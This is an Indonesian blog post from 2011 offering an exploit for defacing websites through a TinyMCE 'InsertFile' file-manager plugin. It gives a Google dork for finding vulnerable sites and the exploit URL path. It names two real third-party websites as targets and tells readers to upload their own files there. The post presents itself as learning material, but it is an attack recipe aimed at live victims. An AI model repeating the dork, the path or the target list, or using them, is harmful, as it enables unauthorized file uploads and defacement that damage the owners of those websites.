Selamat datang di blog saya. Semoga anda mendapatkan informasi terbaru dari artikel yang terdapat di blog saya ini. Saya ENDHIKA mengucapkan terima kasih atas kunjungannya.

15 Dec 2011

Vuln Plugins TinyMCE Insert File

Assalamualaikum :D
Apa kabar sahabat Binus ? saya harap Alhamdulillah ya baik hehe.
Okay dengan saya lagi, saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface.

Langsung saja kita bahas bersama.

Dork:
- inurl:filemanager/insertFile/
*Use Your Head for many target :D
_____________________________________________
/ \
| author: BadBoy |
| E-mail: fikri-badboy@asia-mail.com |
| copyright: 2010-2011 |
| Page:http://www.facebook.com/fikri.badboy |
\_____________________________________________/
| | |
|_ | _|
| | |
|__|__|
/-’P'-\
(__/ \__)
POC / Exploit :
http://[localhost]/Patch/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Setelah itu, maka akan tampil gambar berikut.
TinyMCE
Saya memberi beberapa target ny :D hehe
- http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Upload file kalian, lalu liat deh hasilnya :D
Preview ny bisa dilihat kalo sukses upload ny.
Okay segitu aja dulu ya :D
Good Luck ^^
Thanks To: Palembang Hacker Link | Binus Hacker | Tria Wulandari :( | Shinta Dwi Pratiwi | Maulid Ratu | And My Friends |
Wassalamualaikum.

No comments:

Post a Comment